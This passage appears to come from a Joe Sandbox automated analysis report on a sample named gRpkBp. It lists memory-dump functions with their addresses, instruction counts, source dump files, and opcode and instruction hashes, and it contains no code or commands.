                                                • Opcode ID: d54163a5d6390a451e92bde0cc3f646b28b718535ead54bc1ba8e7e4213e1556
                                                • Instruction ID: 228e82579254f26601306fc6f3d5c9019e148bcc91d921d4495fc1931577bb43
                                                • Opcode Fuzzy Hash: d54163a5d6390a451e92bde0cc3f646b28b718535ead54bc1ba8e7e4213e1556
                                                • Instruction Fuzzy Hash: 7A51B674E11308CFCB08DFA9D59499DBBB2FF89310B208469E805BB365DB31A852CF10
                                                Function 00207839 Relevance: .1, Instructions: 130COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.663079109.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_200000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4ba7689ad4f464ef4986c874f785a0120da85ba531b57f8564e845a248b20797
                                                • Instruction ID: 34c4a445ed6531138ab5cf376af526e961b03c88577fe3e646cbda9c09742d75
                                                • Opcode Fuzzy Hash: 4ba7689ad4f464ef4986c874f785a0120da85ba531b57f8564e845a248b20797
                                                • Instruction Fuzzy Hash: FA51D074D01228CFCB64DF64D988BEDBBB2BB89311F1094AAD409A7391D734AE81CF10
                                                Function 02272AD8 Relevance: .1, Instructions: 124COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.663638618.0000000002270000.00000040.00000800.00020000.00000000.sdmp, Offset: 02270000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_2270000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8c79575a37beac09d00dacadb51f830bc83894815a5acb9712db8725334a59c9
                                                • Instruction ID: 7447404563645b6134a551774072df75ea07a53e7f5c1cdeb6414bdaae71f48f
                                                • Opcode Fuzzy Hash: 8c79575a37beac09d00dacadb51f830bc83894815a5acb9712db8725334a59c9
                                                • Instruction Fuzzy Hash: AE511570D14218CBDB18CFEAD8847DDBBB2BF88314F10D62AE814AB298D7749945CF50
                                                Function 02272C73 Relevance: .1, Instructions: 122COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.663638618.0000000002270000.00000040.00000800.00020000.00000000.sdmp, Offset: 02270000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_2270000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e383329d1b802edbb7da408ea70df5b08c0cb8c2effb0ad2cedf7d96652969a7
                                                • Instruction ID: bc94886d2057384799a720dc161d2c5db31f54c4317cdb87a6da9d045e7fcd3a
                                                • Opcode Fuzzy Hash: e383329d1b802edbb7da408ea70df5b08c0cb8c2effb0ad2cedf7d96652969a7
                                                • Instruction Fuzzy Hash: 8F510074D28208CFCB14CFE9D8887DDBBB1BB49314F20962AE815BB298D7759985CF14
                                                Function 00201548 Relevance: .1, Instructions: 114COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.663079109.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_200000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2bd521a07d0f8138a630470c0b2122c114eac2cee476a7ed94c789d7101adbc1
                                                • Instruction ID: fd0eb3fca2f42af419efc733ea8ad554e6b7d24f4cedbc762a507c2a696537c8
                                                • Opcode Fuzzy Hash: 2bd521a07d0f8138a630470c0b2122c114eac2cee476a7ed94c789d7101adbc1
                                                • Instruction Fuzzy Hash: 6F418170A003199FCB05EFB8D8417AEBBB2EF85300F5044B9D415AB396DB34A955CF91
                                                Function 022A1BC7 Relevance: .1, Instructions: 111COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.663648968.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_22a0000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 585197626ac2a6f65b6c7b55a072319289259de62fdb359142ed73bab9ff23ef
                                                • Instruction ID: 87ef11671f3217ff863d21b296a194b23f8aeb3c9cc0234368bc3a51220febda
                                                • Opcode Fuzzy Hash: 585197626ac2a6f65b6c7b55a072319289259de62fdb359142ed73bab9ff23ef
                                                • Instruction Fuzzy Hash: 1941E0B4E10249CFDB04DFA8D598BEDBBF2EF49310F14812AD805A7294DB745A46CF40
                                                Function 022A1BD0 Relevance: .1, Instructions: 111COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.663648968.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_22a0000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0e3f310a4f5ae10daeaafe2c71206b8c56bc55064dd6ff032af655d86601186e
                                                • Instruction ID: eb5d7cd0c0b9957069b34a06cec5b529b83bd67f4066fb1ec0622dec11250a95
                                                • Opcode Fuzzy Hash: 0e3f310a4f5ae10daeaafe2c71206b8c56bc55064dd6ff032af655d86601186e
                                                • Instruction Fuzzy Hash: 9F41CFB4E10209CFDB04DFA9D598BEDBBF2BF89310F10912AD405A7298DB745A46CF50
                                                Function 022A2E68 Relevance: .1, Instructions: 110COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.663648968.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_22a0000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 12016deac34af4d27e107235f87a5721a4b3d02db54510d2cca9a88f097d68df
                                                • Instruction ID: 9f6bc12f8c756d82d573cc8725ff0fe21f90fcdaabb732ad38770860044cba17
                                                • Opcode Fuzzy Hash: 12016deac34af4d27e107235f87a5721a4b3d02db54510d2cca9a88f097d68df
                                                • Instruction Fuzzy Hash: D5419871E016198BEB58CF6BD95479EFAF3AFC9300F14C1AAC40CA6254EB7409858F51
                                                Function 022A3C29 Relevance: .1, Instructions: 109COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.663648968.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_22a0000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c315699943d3eaed4c1eba9535d8cbdbca7ddbbdf2fb7900a892917836fa32a9
                                                • Instruction ID: 3dbc830e78fca30ee60dd8a375efb8e0bc877ef588bc5542db59e1b31d143bfa
                                                • Opcode Fuzzy Hash: c315699943d3eaed4c1eba9535d8cbdbca7ddbbdf2fb7900a892917836fa32a9
                                                • Instruction Fuzzy Hash: 374188B1E016198BEB58CF5BD95479EFAF3AFC9304F04C1AAC40CA6254EB740A858F51
                                                Function 022A49E8 Relevance: .1, Instructions: 109COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.663648968.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_22a0000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5e7f4d10f790ad356de3ccc5b521454baab276c65b078f33aff1855f9c0b3e4d
                                                • Instruction ID: ac4ba246e0400a326a624da77b4c198346b9bb210f2ee5348942d2b3fd765c3b
                                                • Opcode Fuzzy Hash: 5e7f4d10f790ad356de3ccc5b521454baab276c65b078f33aff1855f9c0b3e4d
                                                • Instruction Fuzzy Hash: 9B4187B1E016188FEB58CF5BD95479AFAF3AFC9304F14C1A9C40CA6264EB740A85CF51
                                                Function 022A50C9 Relevance: .1, Instructions: 109COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.663648968.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_22a0000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ef223df5848441982ce88da1bad690b022947eae17fd83bc24caafe93a9ff3a1
                                                • Instruction ID: ff5f68a368e7b97076743f85912d2030d06435e17319dd138a51aab587fd47f7
                                                • Opcode Fuzzy Hash: ef223df5848441982ce88da1bad690b022947eae17fd83bc24caafe93a9ff3a1
                                                • Instruction Fuzzy Hash: B44158B1E016198BEB58CF6BD95479EFAF3AFC9304F14C1AAC40CA6254EB7409858F51
                                                Function 022A4308 Relevance: .1, Instructions: 108COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.663648968.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_22a0000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 341a758eb34f88db2681518617d300b943cd74e41114ffe7238b5373a3c04e10
                                                • Instruction ID: 3891eb4fd2d15603f32104e7b3a4e0d21906aa91fa019e4e29c6671ea0ffa459
                                                • Opcode Fuzzy Hash: 341a758eb34f88db2681518617d300b943cd74e41114ffe7238b5373a3c04e10
                                                • Instruction Fuzzy Hash: 10418871E016598BEB58CF6BD85479EFAF3AFC9304F14C1AAC40CA6254EB740A85CF51
                                                Function 020E9950 Relevance: .1, Instructions: 97COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.663571310.00000000020E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_20e0000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b8c43a149d6395c2554c7c27c1f3179fdf81708b2bc57cab46dea1f519b2923e
                                                • Instruction ID: 0400dc52b727d96a39c15d1c41a3eaafc5d5581318c52b0a417a6aa92be3a82f
                                                • Opcode Fuzzy Hash: b8c43a149d6395c2554c7c27c1f3179fdf81708b2bc57cab46dea1f519b2923e
                                                • Instruction Fuzzy Hash: E931E174E042488FDB18DFAAC9506EDFBF2AF8A300F24D46AC419BB255DB345946CF54
                                                Function 020F4320 Relevance: .1, Instructions: 96COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.663586936.00000000020F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_20f0000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 45333856a4a0a49f8e2b8ebf7aafc2532ad895bd6f04d8135f533a88a0d16d92
                                                • Instruction ID: b13f93f735ee89c50cf2aeb06afc4b9687a42c4aa48bb8024b7978408508699c
                                                • Opcode Fuzzy Hash: 45333856a4a0a49f8e2b8ebf7aafc2532ad895bd6f04d8135f533a88a0d16d92
                                                • Instruction Fuzzy Hash: 3431F270E002488FDF48DFAAD5506EEBBF2AF89300F24902AC919BB655DB345942CF54
                                                Function 020FA5D9 Relevance: .1, Instructions: 93COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.663586936.00000000020F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_20f0000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 150821777ee45fddb088040a77c37c4e9551c91a2af14a44b8d5a0ea81e84381
                                                • Instruction ID: 365b8bd587926810b2b0251dcab36aedb041a82a84f17278b16d71a39e19a856
                                                • Opcode Fuzzy Hash: 150821777ee45fddb088040a77c37c4e9551c91a2af14a44b8d5a0ea81e84381
                                                • Instruction Fuzzy Hash: 9B31F070E042488FDB48DFAAD8546EEBBF2BF89300F14C02AC819BB658DB345946CF54
                                                Function 002015A0 Relevance: .1, Instructions: 88COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.663079109.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_200000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 39e2c7766f49e37806700680f419bdf9d73e167587ba785a4d6ef69041330e41
                                                • Instruction ID: 8d3221b94f240c75110bdc0c1f03f2d3947ad6fd959e9891edb7ab2044a19786
                                                • Opcode Fuzzy Hash: 39e2c7766f49e37806700680f419bdf9d73e167587ba785a4d6ef69041330e41
                                                • Instruction Fuzzy Hash: AD316E74E003199FDB05EFB8D4817AEBBB2EF85300F1085A8D415AB396DB34AA55CF90
                                                Function 0013D044 Relevance: .1, Instructions: 72COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.663010296.000000000013D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0013D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_13d000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 908f64f124f82f5210ddce4b22df40fab8604f382e2ba4ae559a3d6fcea89514
                                                • Instruction ID: 0a937c136e5f4786b739860845aadafe8b750f7a55049c6f75375938b49c4877
                                                • Opcode Fuzzy Hash: 908f64f124f82f5210ddce4b22df40fab8604f382e2ba4ae559a3d6fcea89514
                                                • Instruction Fuzzy Hash: 2E2104B1604344EFDB19CF24F8C4B26BB65EB84714F34C5A9F8494B246C736D84ACB61
                                                Function 002024C5 Relevance: .1, Instructions: 68COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.663079109.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_200000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a74cf79674c7b7bacde0cd260cb20aad8d72f410414f2bdd5cd97fd281eb6561
                                                • Instruction ID: 4b6f7f9753b5f784fac128f641db1d2fdfd4b93a490c93ed074678a199ed8b43
                                                • Opcode Fuzzy Hash: a74cf79674c7b7bacde0cd260cb20aad8d72f410414f2bdd5cd97fd281eb6561
                                                • Instruction Fuzzy Hash: 2431B778E11308CFCB44DFA4E58899DBBB2FF4A310B209469E809AB364D731AC15CF10
                                                Function 0020E3FB Relevance: .1, Instructions: 62COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.663079109.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_200000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cd1538478431cd546eae0d468e4b247941538a315233a923493a95319afc5941
                                                • Instruction ID: 68fa44f410956fffbb30d6f34ad5510146cab36d2cc0590b10f6854af7c30b59
                                                • Opcode Fuzzy Hash: cd1538478431cd546eae0d468e4b247941538a315233a923493a95319afc5941
                                                • Instruction Fuzzy Hash: 4F117274E102198FDF08CFA8D8C4AADBBB5FB88304F558965E804E7282D7719891CB50
                                                Function 002022DD Relevance: .1, Instructions: 58COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.663079109.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_200000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5a70769ef3e359dad9ccabc1e415e05cb4fae1f8d059e1dbabc63ea4bee8ff7f
                                                • Instruction ID: 83b6669bbfd510000e9f35efabef95cb0165a8d41b0287d8245b07e972d8e4db
                                                • Opcode Fuzzy Hash: 5a70769ef3e359dad9ccabc1e415e05cb4fae1f8d059e1dbabc63ea4bee8ff7f
                                                • Instruction Fuzzy Hash: 631112B0D14209CFCB01DFA8D8841EEBFB5BF4A300B1581AAD804B7255EB309A59CFA1
                                                Function 00206960 Relevance: .1, Instructions: 54COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.663079109.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_200000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 52a392403a6c81ae6329ebb3c981c88f3f88e8bf5fb222e0fe2f15c9b6c1f1cf
                                                • Instruction ID: 929e7253180fbbbbfd516d92951686de13ef869504bf57168eca1dea5a08187e
                                                • Opcode Fuzzy Hash: 52a392403a6c81ae6329ebb3c981c88f3f88e8bf5fb222e0fe2f15c9b6c1f1cf
                                                • Instruction Fuzzy Hash: C0111CB4900209DFDB45EFA8E54579EBBF2FF84300F50C9A9C158AB259EB349A458B81
                                                Function 00202320 Relevance: .1, Instructions: 53COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.663079109.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_200000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0743d622e52b796c86a78edd52c7b5fce78feddeb122613b4897e2a38e26ed7a
                                                • Instruction ID: 8ebf996419a343db1b96deced2622f6bfbb298ae0555974483c27b57390bbed4
                                                • Opcode Fuzzy Hash: 0743d622e52b796c86a78edd52c7b5fce78feddeb122613b4897e2a38e26ed7a
                                                • Instruction Fuzzy Hash: 1121CBB4C142198FCB00EFA9D8846EEBBF5BF4A300F14916AD805F3251EB305A95CFA5
                                                Function 0013D03F Relevance: .1, Instructions: 53COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.663010296.000000000013D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0013D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_13d000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                                                • Instruction ID: 1f67318e7a01657232b7fbebfccc2a7dc644c03f7b2b91288844be4553fd2086
                                                • Opcode Fuzzy Hash: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                                                • Instruction Fuzzy Hash: 9D11BE75504240CFDB16CF10E9C4B15BB61FB44314F24C6A9E8494B256C33AD84ACF61
                                                Function 00205C5F Relevance: .0, Instructions: 47COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.663079109.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_200000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9c76919ecf41f384b6140216a8b930b3e182b44eeace09230b5341c27008af33
                                                • Instruction ID: 19ae7dcd87fefd2333a8edeaa8f5d345fec7d076cd37cb7736bb2c7461510b76
                                                • Opcode Fuzzy Hash: 9c76919ecf41f384b6140216a8b930b3e182b44eeace09230b5341c27008af33
                                                • Instruction Fuzzy Hash: 91115B38D043499FCB01DFB4E8589AEBFB1EF4A300F0085A6D900A73A5D7345A59CF91

                                                Non-executed Functions

                                                Function 022A2130 Relevance: 11.7, Strings: 9, Instructions: 461COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.663648968.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_22a0000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: "$PHp$PHp$PHp$PHp$PHp$PHp$PHp$PHp
                                                • API String ID: 0-3547488823
                                                • Opcode ID: 2350ec4c0991e5f74afb3d9c7d27e1f1da33ac50141acf3ed6ff58c166067000
                                                • Instruction ID: 96848ec601ae83781e5d7af10a8eb6103b2ec74a3230cc7acd32f43cdf7d379d
                                                • Opcode Fuzzy Hash: 2350ec4c0991e5f74afb3d9c7d27e1f1da33ac50141acf3ed6ff58c166067000
                                                • Instruction Fuzzy Hash: BA32A274E01218CFDB68CFA9C954B9DBBB2BF89304F1085A9D809AB355DB719E85CF10
                                                Function 022A2121 Relevance: 11.6, Strings: 9, Instructions: 368COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.663648968.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_22a0000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: "$PHp$PHp$PHp$PHp$PHp$PHp$PHp$PHp
                                                • API String ID: 0-3547488823
                                                • Opcode ID: ec83ce3005a84830340778777ae7163fe27037b82af60743c9f657d0d9494651
                                                • Instruction ID: 5873660bf76d3425298efd222e61ba3cf7e967446499b0959fd5de2f3c950273
                                                • Opcode Fuzzy Hash: ec83ce3005a84830340778777ae7163fe27037b82af60743c9f657d0d9494651
                                                • Instruction Fuzzy Hash: A602D3B4E00218CFDB58DF65D954B9DBBB2BF89300F1081A9D809AB355DB719E85CF10